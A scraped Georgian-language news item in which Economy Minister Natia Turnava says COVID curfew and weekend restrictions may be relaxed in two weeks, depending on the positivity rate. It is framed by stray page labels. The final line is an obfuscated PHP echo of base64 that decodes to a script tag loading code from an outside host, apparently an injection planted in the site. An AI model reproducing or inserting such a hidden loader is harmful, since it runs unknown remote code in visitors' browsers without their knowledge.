celsiusi
ავერსი საქკაბელი

ეკონომიკისა და მდგრადი განვითარების მინისტრი ნათია თურნავა ფიქრობს, რომ უახლოესი ორი კვირის შემდეგ, როდესაც კიდევ ერთხელ გადახედავენ დადებითობის მაჩვენებელს, რომელიც დღეს მაღალია, შესაძლოა გარკვეული შემსუბუქებები გაკეთდეს.

მისივე თქმით, ღამის საათებში გადაადგილებასთან დაკავშირებით შეზღუდვას ბევრი ქვეყანა იყენებს ეპიდვითარების მიხედვით, მათ შორის საქართველო.

„ღამის საათების და შაბათ კვირების შეზღუდვა არ არის ქართული ნოუჰაუ. სამწუხაროდ, კოვიდპანდემიის პერიოდში ძალიან ბევრი ქვეყანა, მათ შორის ევროპული ქვეყანაც პერიოდულად მიმართავს ასეთ შეზღუდვას. ამიტომ, რა თქმა უნდა, არც ტურისტებს უკვირთ, რომ მსგავსი სახის შეზღუდვები იქნება. უფრო მეტიც, ბოლო დროს ტურისტები კითხულობენ, რამდენად უსაფრთხოა ქვეყანა, რამდენად იცავს სხვადასხვა პროტოკოლს. ქვეყანა, სადაც არ არის დაცული ელემენტარული შეზღუდვები, ალბათ ეჭვს გამოიწვევდა. თუმცა იმაშიც გეთანხმებით, რომ გარკვეულ დისკომფორტს ქმნის, როდესაც მაგალითად, შაბათ-კვირას ჩვენი სახელმწიფოს სტუმრები, ჩვენი მოქალაქეები ვერ მიდიან რესტორანში და თავისუფლად ვერ სადილობენ. ეს რა თქმა უნდა, დარტყმაც არის სარესტორნო და სასტუმრო ინდუსტრიისთვის. აქედან გამომდინარე, ჩვენ ვფიქრობთ, რომ უახლოესი ორი კვირის შემდეგ, როდესაც ჩვენ კიდევ ერთხელ გადავხედავთ დადებითობის მაჩვენებელს, რომელიც დღეს მაღალია, მაგრამ გვაქვს მოლოდინი რომ შემცირდება, შევძლებთ, გარკვეული შემსუბუქებები გავაკეთოთ“, – განაცხადა ნათია თურნავამ.

 

 

2529
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");